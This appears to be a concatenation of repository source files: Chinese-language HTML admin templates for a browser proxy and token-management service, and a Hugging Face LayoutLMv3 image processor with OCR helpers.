<label for="remote-proxy-addr">远程代理地址 (格式: IP:端口)</label>
<input type="text" id="remote-proxy-addr" name="remote-proxy-addr" placeholder="例如: 160.20.18.17:3989">
</div>
<div class="form-group">
<label for="remote-proxy-user">远程代理用户名</label>
<input type="text" id="remote-proxy-user" name="remote-proxy-user" placeholder="例如: admin">
</div>
<div class="form-group">
<label for="remote-proxy-pass">远程代理密码</label>
<input type="password" id="remote-proxy-pass" name="remote-proxy-pass" placeholder="输入远程代理密码">
</div>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="allow-anonymous" name="allow-anonymous">
<label for="allow-anonymous">允许匿名访问 (不需要账号密码即可使用代理)</label>
</div>
<button type="submit" class="btn-save">保存设置</button>
</form>
</div>
<!-- 访问统计面板 -->
<div id="stats-panel" class="panel">
<h2>访问统计</h2>
<div class="stats-summary">
<div class="stats-card">
<h3>总请求数</h3>
<div id="total-requests" class="stats-value">0</div>
</div>
<div class="stats-card">
<h3>域名统计</h3>
<div class="stats-table-container">
<table class="stats-table">
<thead>
<tr>
<th>域名</th>
<th>请求次数</th>
<th>最后访问时间</th>
</tr>
</thead>
<tbody id="domain-stats">
<!-- 域名统计将通过JavaScript动态生成 -->
</tbody>
</table>
</div>
</div>
<button id="reset-stats" class="btn-reset">重置统计</button>
</div>
</div>
</div>
</div>
</div>
<script src="/static/js/dashboard.js"></script>
</body>
</html> |
2833844911/cyTlsXhr | 2,468 | templates/admin_login.html | <!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>管理员登录</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f5f5f5;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.login-container {
background-color: #ffffff;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
padding: 30px;
width: 350px;
max-width: 100%;
}
h1 {
text-align: center;
color: #333;
margin-bottom: 30px;
}
.form-group {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 5px;
color: #555;
font-weight: bold;
}
input[type="text"],
input[type="password"] {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
font-size: 16px;
}
button {
background-color: #4a90e2;
color: white;
border: none;
border-radius: 4px;
padding: 12px 20px;
font-size: 16px;
cursor: pointer;
width: 100%;
transition: background-color 0.3s;
}
button:hover {
background-color: #357abd;
}
.error-message {
color: #e74c3c;
margin-top: 15px;
text-align: center;
}
</style>
</head>
<body>
<div class="login-container">
<h1>管理员登录</h1>
{{if .Error}}
<div class="error-message">{{.Error}}</div>
{{end}}
<form action="/admin/login" method="post">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" required>
</div>
<button type="submit">登录</button>
</form>
</div>
</body>
</html> |
2833844911/cyTlsXhr | 22,039 | templates/info.html | <!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>浏览器代理系统信息</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 20px;
background-color: #f5f5f5;
}
.container {
max-width: 1200px;
margin: 0 auto;
background-color: white;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
padding: 20px;
}
h1, h2, h3 {
color: #333;
}
.header {
display: flex;
justify-content: space-between;
align-items: center;
margin-bottom: 20px;
}
.logout-btn {
background-color: #f44336;
color: white;
border: none;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
font-size: 14px;
}
.logout-btn:hover {
background-color: #d32f2f;
}
.info-card {
background-color: #f9f9f9;
border-radius: 8px;
padding: 15px;
margin-bottom: 20px;
box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}
.info-grid {
display: grid;
grid-template-columns: repeat(3, 1fr);
gap: 20px;
margin-bottom: 30px;
}
.info-item {
background-color: #fff;
border-radius: 6px;
box-shadow: 0 1px 5px rgba(0, 0, 0, 0.08);
padding: 15px;
text-align: center;
}
.info-item h3 {
margin-top: 0;
color: #666;
font-size: 16px;
}
.info-value {
font-size: 32px;
font-weight: bold;
color: #2a5885;
}
table {
width: 100%;
border-collapse: collapse;
margin: 20px 0;
}
th, td {
padding: 12px 15px;
text-align: left;
border-bottom: 1px solid #e0e0e0;
}
th {
background-color: #f2f2f2;
font-weight: bold;
color: #333;
}
tr:hover {
background-color: #f9f9f9;
}
.status-badge {
display: inline-block;
padding: 4px 8px;
border-radius: 4px;
font-size: 12px;
font-weight: bold;
color: white;
}
.status-connected {
background-color: #4CAF50;
}
.status-disconnected {
background-color: #F44336;
}
.status-busy {
background-color: #FF9800;
}
.tabs {
display: flex;
border-bottom: 1px solid #ddd;
margin-bottom: 20px;
}
.tab {
padding: 10px 20px;
cursor: pointer;
border: 1px solid transparent;
border-bottom: none;
margin-right: 5px;
border-radius: 4px 4px 0 0;
}
.tab.active {
border-color: #ddd;
background-color: white;
margin-bottom: -1px;
color: #2a5885;
font-weight: bold;
}
.tab-content {
display: none;
}
.tab-content.active {
display: block;
}
.refresh-btn {
background-color: #4CAF50;
color: white;
border: none;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
font-size: 14px;
float: right;
}
.refresh-btn:hover {
background-color: #45a049;
}
.action-btn {
background-color: #2196F3;
color: white;
border: none;
padding: 6px 12px;
border-radius: 4px;
cursor: pointer;
font-size: 13px;
margin-right: 5px;
}
.action-btn.delete {
background-color: #F44336;
}
.action-btn:hover {
opacity: 0.9;
}
.form-container {
max-width: 600px;
margin: 0 auto;
background-color: #f9f9f9;
padding: 20px;
border-radius: 8px;
}
.form-group {
margin-bottom: 15px;
}
label {
display: block;
margin-bottom: 5px;
font-weight: bold;
}
input[type="text"],
input[type="number"],
input[type="date"],
input[type="time"],
select {
width: 100%;
padding: 8px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
}
.checkbox-group {
margin: 10px 0;
}
.submit-btn {
background-color: #4CAF50;
color: white;
border: none;
padding: 10px 20px;
border-radius: 4px;
cursor: pointer;
font-size: 16px;
margin-top: 10px;
}
.submit-btn:hover {
background-color: #45a049;
}
.token-display {
background-color: #e9f7e9;
border: 1px solid #4CAF50;
padding: 15px;
border-radius: 4px;
margin-top: 20px;
display: none;
}
.token-value {
font-family: monospace;
background-color: #f0f0f0;
padding: 5px;
border-radius: 3px;
word-break: break-all;
}
.hidden {
display: none;
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>浏览器代理系统信息
<button class="refresh-btn" onclick="refreshData()">刷新</button>
</h1>
<button class="logout-btn" onclick="logout()">登出</button>
</div>
<div class="info-grid">
<div class="info-item">
<h3>已连接浏览器</h3>
<div class="info-value" id="client-count">0</div>
</div>
<div class="info-item">
<h3>总请求次数</h3>
<div class="info-value" id="request-count">0</div>
</div>
<div class="info-item">
<h3>活跃令牌数量</h3>
<div class="info-value" id="token-count">0</div>
</div>
</div>
<div class="tabs">
<div class="tab active" onclick="openTab(event, 'browsers-tab')">浏览器状态</div>
<div class="tab" onclick="openTab(event, 'tokens-tab')">令牌管理</div>
<div class="tab" onclick="openTab(event, 'new-token-tab')">创建令牌</div>
</div>
<div id="browsers-tab" class="tab-content active">
<h2>浏览器列表</h2>
<table>
<thead>
<tr>
<th>ID</th>
<th>名称</th>
<th>状态</th>
<th>代理</th>
<th>代理ID</th>
<th>版本</th>
<th>连接时间</th>
<th>请求次数</th>
</tr>
</thead>
<tbody id="browsers-table">
<!-- 浏览器数据将在这里动态加载 -->
</tbody>
</table>
</div>
<div id="tokens-tab" class="tab-content">
<h2>令牌列表</h2>
<table>
<thead>
<tr>
<th>令牌</th>
<th>名称</th>
<th>创建时间</th>
<th>过期时间</th>
<th>使用次数/限制</th>
<th>允许的浏览器</th>
<th>操作</th>
</tr>
</thead>
<tbody id="tokens-table">
<!-- 令牌数据将在这里动态加载 -->
</tbody>
</table>
</div>
<div id="new-token-tab" class="tab-content">
<h2>创建新令牌</h2>
<div class="form-container">
<div class="form-group">
<label for="token-name">令牌名称</label>
<input type="text" id="token-name" placeholder="输入令牌名称">
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="unlimited-time" checked>
<label for="unlimited-time" style="display: inline;">永不过期</label>
</div>
<div id="expiry-time-container" class="hidden">
<label for="expiry-date">过期日期</label>
<input type="date" id="expiry-date">
<label for="expiry-time">过期时间</label>
<input type="time" id="expiry-time">
</div>
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="unlimited-uses" checked>
<label for="unlimited-uses" style="display: inline;">无限使用次数</label>
</div>
<div id="max-uses-container" class="hidden">
<label for="max-uses">最大使用次数</label>
<input type="number" id="max-uses" min="1" value="100">
</div>
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="allow-all-clients" checked>
<label for="allow-all-clients" style="display: inline;">允许所有浏览器</label>
</div>
<div id="allowed-clients-container" class="hidden">
<label for="allowed-clients">允许的浏览器</label>
<select id="allowed-clients" multiple size="4">
<!-- 浏览器选项将在这里动态加载 -->
</select>
<small>按住Ctrl键可以选择多个浏览器</small>
</div>
</div>
<button class="submit-btn" onclick="createToken()">创建令牌</button>
<div class="token-display" id="new-token-display">
<h3>新令牌已创建</h3>
<p>请保存以下令牌值,它只会显示一次:</p>
<div class="token-value" id="new-token-value"></div>
</div>
</div>
</div>
</div>
<script>
// 当前系统数据
let systemData = {
browsers: [],
tokens: []
};
// 页面加载时获取数据
document.addEventListener('DOMContentLoaded', function() {
refreshData();
// 设置过期和使用次数复选框的事件
document.getElementById('unlimited-time').addEventListener('change', function() {
document.getElementById('expiry-time-container').classList.toggle('hidden', this.checked);
});
document.getElementById('unlimited-uses').addEventListener('change', function() {
document.getElementById('max-uses-container').classList.toggle('hidden', this.checked);
});
document.getElementById('allow-all-clients').addEventListener('change', function() {
document.getElementById('allowed-clients-container').classList.toggle('hidden', this.checked);
});
});
// 切换标签页
function openTab(evt, tabName) {
// 隐藏所有标签内容
const tabContents = document.getElementsByClassName('tab-content');
for (let i = 0; i < tabContents.length; i++) {
tabContents[i].classList.remove('active');
}
// 取消所有标签的active状态
const tabs = document.getElementsByClassName('tab');
for (let i = 0; i < tabs.length; i++) {
tabs[i].classList.remove('active');
}
// 显示当前标签内容并激活当前标签
document.getElementById(tabName).classList.add('active');
evt.currentTarget.classList.add('active');
}
// 刷新所有数据
function refreshData() {
fetch('/api/system_info')
.then(response => response.json())
.then(data => {
systemData = data;
// 更新摘要信息
document.getElementById('client-count').textContent = data.client_count;
document.getElementById('request-count').textContent = data.total_requests;
document.getElementById('token-count').textContent = data.active_tokens;
// 更新浏览器列表
updateBrowsersTable(data.browsers);
// 更新令牌列表
updateTokensTable(data.tokens);
// 更新浏览器选择框
updateBrowserSelect(data.browsers);
})
.catch(error => {
console.error('获取系统信息失败:', error);
});
}
// 更新浏览器表格
function updateBrowsersTable(browsers) {
const tableBody = document.getElementById('browsers-table');
tableBody.innerHTML = '';
if (browsers.length === 0) {
const row = document.createElement('tr');
row.innerHTML = '<td colspan="8" style="text-align: center;">没有已连接的浏览器</td>';
tableBody.appendChild(row);
return;
}
browsers.forEach(browser => {
const row = document.createElement('tr');
// 为忙碌的浏览器添加不同的背景色
if (browser.busy) {
row.style.backgroundColor = '#fff8e1';
}
row.innerHTML = `
<td>${browser.id}</td>
<td>${browser.name}</td>
<td>
<span class="status-badge ${browser.status === '已连接' ? 'status-connected' : 'status-disconnected'}">
${browser.status}
</span>
${browser.busy ? '<span class="status-badge status-busy">忙碌中</span>' : ''}
</td>
<td>${browser.proxy}</td>
<td>${browser.proxy_id}</td>
<td>${browser.version}</td>
<td>${browser.connected_at}</td>
<td>${browser.request_count}</td>
`;
tableBody.appendChild(row);
});
}
// 更新令牌表格
function updateTokensTable(tokens) {
const tableBody = document.getElementById('tokens-table');
tableBody.innerHTML = '';
if (tokens.length === 0) {
const row = document.createElement('tr');
row.innerHTML = '<td colspan="7" style="text-align: center;">没有活跃的令牌</td>';
tableBody.appendChild(row);
return;
}
tokens.forEach(token => {
const row = document.createElement('tr');
// 显示截断的令牌值
const shortToken = token.token.substring(0, 8) + '...' + token.token.substring(token.token.length - 4);
// 显示使用情况
const useLimit = typeof token.max_uses === 'string' ? token.max_uses : `${token.uses}/${token.max_uses}`;
// 显示允许的浏览器
const allowedClients = Array.isArray(token.allowed_clients)
? token.allowed_clients.join(', ')
: token.allowed_clients;
row.innerHTML = `
<td title="${token.token}">${shortToken}</td>
<td>${token.name}</td>
<td>${token.created_at}</td>
<td>${token.expiry}</td>
<td>${useLimit}</td>
<td>${allowedClients}</td>
<td>
<button class="action-btn delete" onclick="deleteToken('${token.token}')">删除</button>
</td>
`;
tableBody.appendChild(row);
});
}
// 更新浏览器选择框
function updateBrowserSelect(browsers) {
const select = document.getElementById('allowed-clients');
select.innerHTML = '';
const connectedBrowsers = browsers.filter(browser => browser.status === '已连接');
if (connectedBrowsers.length === 0) {
const option = document.createElement('option');
option.disabled = true;
option.textContent = '没有已连接的浏览器';
select.appendChild(option);
return;
}
connectedBrowsers.forEach(browser => {
const option = document.createElement('option');
option.value = browser.id;
option.textContent = `${browser.name} (${browser.id})`;
select.appendChild(option);
});
}
// 创建新令牌
function createToken() {
// 获取表单数据
const name = document.getElementById('token-name').value || '未命名令牌';
const unlimitedTime = document.getElementById('unlimited-time').checked;
const unlimitedUses = document.getElementById('unlimited-uses').checked;
const allowAllClients = document.getElementById('allow-all-clients').checked;
// 构建请求数据
const data = {
name: name,
unlimited_time: unlimitedTime,
unlimited_uses: unlimitedUses,
allow_all_clients: allowAllClients
};
// 如果有过期时间
if (!unlimitedTime) {
const expiryDate = document.getElementById('expiry-date').value;
const expiryTime = document.getElementById('expiry-time').value || '23:59:59';
if (!expiryDate) {
alert('请选择过期日期');
return;
}
data.expiry_date = expiryDate;
data.expiry_time = expiryTime;
}
// 如果有使用次数限制
if (!unlimitedUses) {
const maxUses = document.getElementById('max-uses').value;
if (!maxUses || parseInt(maxUses) <= 0) {
alert('请输入有效的使用次数限制');
return;
}
data.max_uses = parseInt(maxUses);
}
// 如果限制了允许的浏览器
if (!allowAllClients) {
const select = document.getElementById('allowed-clients');
const selectedBrowsers = Array.from(select.selectedOptions).map(option => option.value);
if (selectedBrowsers.length === 0) {
alert('请至少选择一个浏览器');
return;
}
data.allowed_clients = selectedBrowsers;
}
// 发送请求创建令牌
fetch('/api/tokens', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => response.json())
.then(result => {
if (result.status === 'success') {
// 显示新令牌
document.getElementById('new-token-value').textContent = result.token;
document.getElementById('new-token-display').style.display = 'block';
// 刷新数据
refreshData();
// 重置表单
document.getElementById('token-name').value = '';
} else {
alert('创建令牌失败: ' + (result.error || '未知错误'));
}
})
.catch(error => {
console.error('创建令牌请求失败:', error);
alert('创建令牌请求失败');
});
}
// 删除令牌
function deleteToken(token) {
if (confirm('确认要删除此令牌吗?删除后将无法恢复。')) {
fetch(`/api/tokens/${token}`, {
method: 'DELETE'
})
.then(response => response.json())
.then(result => {
if (result.status === 'success') {
refreshData();
} else {
alert('删除令牌失败: ' + (result.error || '未知错误'));
}
})
.catch(error => {
console.error('删除令牌请求失败:', error);
alert('删除令牌请求失败');
});
}
}
// 登出函数
function logout() {
if (confirm('确认要退出登录吗?')) {
window.location.href = '/admin/logout';
}
}
// 初始加载
refreshData();
</script>
</body>
</html> |
27182812/ChatGLM-LLaMA-chinese-insturct | 17,401 | src/transformers/models/layoutlmv3/image_processing_layoutlmv3.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image processor class for LayoutLMv3."""
from typing import Dict, Iterable, Optional, Union
import numpy as np
from ...image_processing_utils import BaseImageProcessor, BatchFeature, get_size_dict
from ...image_transforms import normalize, rescale, resize, to_channel_dimension_format, to_pil_image
from ...image_utils import (
IMAGENET_STANDARD_MEAN,
IMAGENET_STANDARD_STD,
ChannelDimension,
ImageInput,
PILImageResampling,
infer_channel_dimension_format,
make_list_of_images,
to_numpy_array,
valid_images,
)
from ...utils import TensorType, is_pytesseract_available, is_vision_available, logging, requires_backends
if is_vision_available():
import PIL
# soft dependency
if is_pytesseract_available():
import pytesseract
logger = logging.get_logger(__name__)
def normalize_box(box, width, height):
    """Scale a pixel-space box ``(x0, y0, x1, y1)`` into the 0-1000 coordinate
    system used by LayoutLM-family models, given the image's width and height."""
    x0, y0, x1, y1 = box[0], box[1], box[2], box[3]
    return [
        int(1000 * (x0 / width)),
        int(1000 * (y0 / height)),
        int(1000 * (x1 / width)),
        int(1000 * (y1 / height)),
    ]
def apply_tesseract(image: np.ndarray, lang: Optional[str], tesseract_config: Optional[str]):
    """Applies Tesseract OCR on a document image, and returns recognized words + normalized bounding boxes.

    Args:
        image: Document image as a numpy array; converted to PIL before OCR.
        lang: ISO language code passed to Tesseract, or `None` for the default.
        tesseract_config: Extra command-line flags forwarded to Tesseract.

    Returns:
        Tuple `(words, normalized_boxes)` where each box is `[x0, y0, x1, y1]`
        scaled to the 0-1000 range via `normalize_box`.

    Raises:
        ValueError: If the number of words and boxes ever disagree (internal sanity check).
    """
    # apply OCR
    pil_image = to_pil_image(image)
    image_width, image_height = pil_image.size
    data = pytesseract.image_to_data(pil_image, lang=lang, output_type="dict", config=tesseract_config)
    words, left, top, width, height = data["text"], data["left"], data["top"], data["width"], data["height"]
    # filter empty words and corresponding coordinates; a set makes each
    # membership test O(1) instead of scanning a list for every element
    irrelevant_indices = {idx for idx, word in enumerate(words) if not word.strip()}
    words = [word for idx, word in enumerate(words) if idx not in irrelevant_indices]
    left = [coord for idx, coord in enumerate(left) if idx not in irrelevant_indices]
    top = [coord for idx, coord in enumerate(top) if idx not in irrelevant_indices]
    width = [coord for idx, coord in enumerate(width) if idx not in irrelevant_indices]
    height = [coord for idx, coord in enumerate(height) if idx not in irrelevant_indices]
    # turn coordinates into (left, top, left+width, top+height) format
    actual_boxes = [[x, y, x + w, y + h] for x, y, w, h in zip(left, top, width, height)]
    # finally, normalize the bounding boxes
    normalized_boxes = [normalize_box(box, image_width, image_height) for box in actual_boxes]
    # raise (rather than assert, which is stripped under `python -O`) on mismatch
    if len(words) != len(normalized_boxes):
        raise ValueError("Not as many words as there are bounding boxes")
    return words, normalized_boxes
def flip_channel_order(image: np.ndarray, data_format: Optional[ChannelDimension] = None) -> np.ndarray:
    """Reverse the channel order of `image` (e.g. RGB <-> BGR), optionally
    converting the result to `data_format` afterwards."""
    input_data_format = infer_channel_dimension_format(image)
    if input_data_format == ChannelDimension.LAST:
        # Channels are the trailing axis: works for both (H, W, C) and (B, H, W, C).
        image = image[..., ::-1]
    elif input_data_format == ChannelDimension.FIRST:
        # NOTE(review): this flips axis 1, which is the channel axis only for a
        # batched (B, C, H, W) input; for an unbatched (C, H, W) image it would
        # flip the height axis instead — confirm the expected input rank.
        image = image[:, ::-1, ...]
    else:
        raise ValueError(f"Unsupported channel dimension: {input_data_format}")
    # Only convert the layout when the caller explicitly asked for one.
    if data_format is not None:
        image = to_channel_dimension_format(image, data_format)
    return image
class LayoutLMv3ImageProcessor(BaseImageProcessor):
    r"""
    Constructs a LayoutLMv3 image processor.
    Args:
        do_resize (`bool`, *optional*, defaults to `True`):
            Whether to resize the image's (height, width) dimensions to `(size["height"], size["width"])`. Can be
            overridden by `do_resize` in `preprocess`.
        size (`Dict[str, int]` *optional*, defaults to `{"height": 224, "width": 224}`):
            Size of the image after resizing. Can be overridden by `size` in `preprocess`.
        resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BILINEAR`):
            Resampling filter to use if resizing the image. Can be overridden by `resample` in `preprocess`.
        do_rescale (`bool`, *optional*, defaults to `True`):
            Whether to rescale the image's pixel values by the specified `rescale_value`. Can be overridden by
            `do_rescale` in `preprocess`.
        rescale_factor (`float`, *optional*, defaults to 1 / 255):
            Value by which the image's pixel values are rescaled. Can be overridden by `rescale_factor` in
            `preprocess`.
        do_normalize (`bool`, *optional*, defaults to `True`):
            Whether to normalize the image. Can be overridden by the `do_normalize` parameter in the `preprocess`
            method.
        image_mean (`Iterable[float]` or `float`, *optional*, defaults to `IMAGENET_STANDARD_MEAN`):
            Mean to use if normalizing the image. This is a float or list of floats the length of the number of
            channels in the image. Can be overridden by the `image_mean` parameter in the `preprocess` method.
        image_std (`Iterable[float]` or `float`, *optional*, defaults to `IMAGENET_STANDARD_STD`):
            Standard deviation to use if normalizing the image. This is a float or list of floats the length of the
            number of channels in the image. Can be overridden by the `image_std` parameter in the `preprocess` method.
        apply_ocr (`bool`, *optional*, defaults to `True`):
            Whether to apply the Tesseract OCR engine to get words + normalized bounding boxes. Can be overridden by
            the `apply_ocr` parameter in the `preprocess` method.
        ocr_lang (`str`, *optional*):
            The language, specified by its ISO code, to be used by the Tesseract OCR engine. By default, English is
            used. Can be overridden by the `ocr_lang` parameter in the `preprocess` method.
        tesseract_config (`str`, *optional*):
            Any additional custom configuration flags that are forwarded to the `config` parameter when calling
            Tesseract. For example: '--psm 6'. Can be overridden by the `tesseract_config` parameter in the
            `preprocess` method.
    """
    model_input_names = ["pixel_values"]
    def __init__(
        self,
        do_resize: bool = True,
        size: Dict[str, int] = None,
        resample: PILImageResampling = PILImageResampling.BILINEAR,
        do_rescale: bool = True,
        rescale_value: float = 1 / 255,
        do_normalize: bool = True,
        image_mean: Union[float, Iterable[float]] = None,
        image_std: Union[float, Iterable[float]] = None,
        apply_ocr: bool = True,
        ocr_lang: Optional[str] = None,
        tesseract_config: Optional[str] = "",
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        size = size if size is not None else {"height": 224, "width": 224}
        size = get_size_dict(size)
        self.do_resize = do_resize
        self.size = size
        self.resample = resample
        self.do_rescale = do_rescale
        # NOTE: the constructor parameter is named `rescale_value` (kept for backward
        # compatibility) but it is stored as `rescale_factor`, which is the name used
        # everywhere else (docstring, `preprocess`).
        self.rescale_factor = rescale_value
        self.do_normalize = do_normalize
        self.image_mean = image_mean if image_mean is not None else IMAGENET_STANDARD_MEAN
        self.image_std = image_std if image_std is not None else IMAGENET_STANDARD_STD
        self.apply_ocr = apply_ocr
        self.ocr_lang = ocr_lang
        self.tesseract_config = tesseract_config
    def resize(
        self,
        image: np.ndarray,
        size: Dict[str, int],
        resample: PILImageResampling = PILImageResampling.BILINEAR,
        data_format: Optional[Union[str, ChannelDimension]] = None,
        **kwargs,
    ) -> np.ndarray:
        """
        Resize an image to (size["height"], size["width"]) dimensions.
        Args:
            image (`np.ndarray`):
                Image to resize.
            size (`Dict[str, int]`):
                Size of the output image.
            resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BILINEAR`):
                Resampling filter to use when resizing the image.
            data_format (`str` or `ChannelDimension`, *optional*):
                The channel dimension format of the image. If not provided, it will be the same as the input image.
        """
        size = get_size_dict(size)
        if "height" not in size or "width" not in size:
            raise ValueError(f"The size dictionary must contain the keys 'height' and 'width'. Got {size.keys()}")
        output_size = (size["height"], size["width"])
        return resize(image, size=output_size, resample=resample, data_format=data_format, **kwargs)
    def rescale(
        self,
        image: np.ndarray,
        scale: Union[int, float],
        data_format: Optional[Union[str, ChannelDimension]] = None,
        **kwargs,
    ) -> np.ndarray:
        """
        Rescale an image by a scale factor. image = image * scale.
        Args:
            image (`np.ndarray`):
                Image to rescale.
            scale (`int` or `float`):
                Scale to apply to the image.
            data_format (`str` or `ChannelDimension`, *optional*):
                The channel dimension format of the image. If not provided, it will be the same as the input image.
        """
        return rescale(image, scale=scale, data_format=data_format, **kwargs)
    def normalize(
        self,
        image: np.ndarray,
        mean: Union[float, Iterable[float]],
        std: Union[float, Iterable[float]],
        data_format: Optional[Union[str, ChannelDimension]] = None,
        **kwargs,
    ) -> np.ndarray:
        """
        Normalize an image.
        Args:
            image (`np.ndarray`):
                Image to normalize.
            mean (`float` or `Iterable[float]`):
                Mean values to be used for normalization.
            std (`float` or `Iterable[float]`):
                Standard deviation values to be used for normalization.
            data_format (`str` or `ChannelDimension`, *optional*):
                The channel dimension format of the image. If not provided, it will be the same as the input image.
        """
        return normalize(image, mean=mean, std=std, data_format=data_format, **kwargs)
    def preprocess(
        self,
        images: ImageInput,
        do_resize: bool = None,
        size: Dict[str, int] = None,
        resample=None,
        do_rescale: bool = None,
        rescale_factor: float = None,
        do_normalize: bool = None,
        image_mean: Union[float, Iterable[float]] = None,
        image_std: Union[float, Iterable[float]] = None,
        apply_ocr: bool = None,
        ocr_lang: Optional[str] = None,
        tesseract_config: Optional[str] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        data_format: ChannelDimension = ChannelDimension.FIRST,
        **kwargs,
    ) -> PIL.Image.Image:
        """
        Preprocess an image or batch of images.
        Args:
            images (`ImageInput`):
                Image to preprocess.
            do_resize (`bool`, *optional*, defaults to `self.do_resize`):
                Whether to resize the image.
            size (`Dict[str, int]`, *optional*, defaults to `self.size`):
                Desired size of the output image after applying `resize`.
            resample (`int`, *optional*, defaults to `self.resample`):
                Resampling filter to use if resizing the image. This can be one of the `PILImageResampling` filters.
                Only has an effect if `do_resize` is set to `True`.
            do_rescale (`bool`, *optional*, defaults to `self.do_rescale`):
                Whether to rescale the image pixel values between [0, 1].
            rescale_factor (`float`, *optional*, defaults to `self.rescale_factor`):
                Rescale factor to apply to the image pixel values. Only has an effect if `do_rescale` is set to `True`.
            do_normalize (`bool`, *optional*, defaults to `self.do_normalize`):
                Whether to normalize the image.
            image_mean (`float` or `Iterable[float]`, *optional*, defaults to `self.image_mean`):
                Mean values to be used for normalization. Only has an effect if `do_normalize` is set to `True`.
            image_std (`float` or `Iterable[float]`, *optional*, defaults to `self.image_std`):
                Standard deviation values to be used for normalization. Only has an effect if `do_normalize` is set to
                `True`.
            apply_ocr (`bool`, *optional*, defaults to `self.apply_ocr`):
                Whether to apply the Tesseract OCR engine to get words + normalized bounding boxes.
            ocr_lang (`str`, *optional*, defaults to `self.ocr_lang`):
                The language, specified by its ISO code, to be used by the Tesseract OCR engine. By default, English is
                used.
            tesseract_config (`str`, *optional*, defaults to `self.tesseract_config`):
                Any additional custom configuration flags that are forwarded to the `config` parameter when calling
                Tesseract.
            return_tensors (`str` or `TensorType`, *optional*):
                The type of tensors to return. Can be one of:
                - Unset: Return a list of `np.ndarray`.
                - `TensorType.TENSORFLOW` or `'tf'`: Return a batch of type `tf.Tensor`.
                - `TensorType.PYTORCH` or `'pt'`: Return a batch of type `torch.Tensor`.
                - `TensorType.NUMPY` or `'np'`: Return a batch of type `np.ndarray`.
                - `TensorType.JAX` or `'jax'`: Return a batch of type `jax.numpy.ndarray`.
            data_format (`ChannelDimension` or `str`, *optional*, defaults to `ChannelDimension.FIRST`):
                The channel dimension format for the output image. Can be one of:
                - `ChannelDimension.FIRST`: image in (num_channels, height, width) format.
                - `ChannelDimension.LAST`: image in (height, width, num_channels) format.
        """
        # Per-call arguments take precedence; fall back to the values set in __init__.
        do_resize = do_resize if do_resize is not None else self.do_resize
        size = size if size is not None else self.size
        size = get_size_dict(size)
        resample = resample if resample is not None else self.resample
        do_rescale = do_rescale if do_rescale is not None else self.do_rescale
        rescale_factor = rescale_factor if rescale_factor is not None else self.rescale_factor
        do_normalize = do_normalize if do_normalize is not None else self.do_normalize
        image_mean = image_mean if image_mean is not None else self.image_mean
        image_std = image_std if image_std is not None else self.image_std
        apply_ocr = apply_ocr if apply_ocr is not None else self.apply_ocr
        ocr_lang = ocr_lang if ocr_lang is not None else self.ocr_lang
        tesseract_config = tesseract_config if tesseract_config is not None else self.tesseract_config
        images = make_list_of_images(images)
        if not valid_images(images):
            raise ValueError(
                "Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, "
                "torch.Tensor, tf.Tensor or jax.ndarray."
            )
        if do_resize and size is None:
            raise ValueError("Size must be specified if do_resize is True.")
        if do_rescale and rescale_factor is None:
            raise ValueError("Rescale factor must be specified if do_rescale is True.")
        if do_normalize and (image_mean is None or image_std is None):
            raise ValueError("If do_normalize is True, image_mean and image_std must be specified.")
        # All transformations expect numpy arrays.
        images = [to_numpy_array(image) for image in images]
        # Tesseract OCR to get words + normalized bounding boxes.
        # OCR runs on the original (un-resized, un-normalized) images so the boxes
        # refer to the original page geometry.
        if apply_ocr:
            requires_backends(self, "pytesseract")
            words_batch = []
            boxes_batch = []
            for image in images:
                words, boxes = apply_tesseract(image, ocr_lang, tesseract_config)
                words_batch.append(words)
                boxes_batch.append(boxes)
        if do_resize:
            images = [self.resize(image=image, size=size, resample=resample) for image in images]
        if do_rescale:
            images = [self.rescale(image=image, scale=rescale_factor) for image in images]
        if do_normalize:
            images = [self.normalize(image=image, mean=image_mean, std=image_std) for image in images]
        # Convert every image to the requested channel dimension format (no color
        # channel reordering happens here, only the axis layout is changed).
        images = [to_channel_dimension_format(image, data_format) for image in images]
        data = BatchFeature(data={"pixel_values": images}, tensor_type=return_tensors)
        if apply_ocr:
            data["words"] = words_batch
            data["boxes"] = boxes_batch
        return data
|
2833844911/cyTlsXhr | 1,018 | templates/login.html | <!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
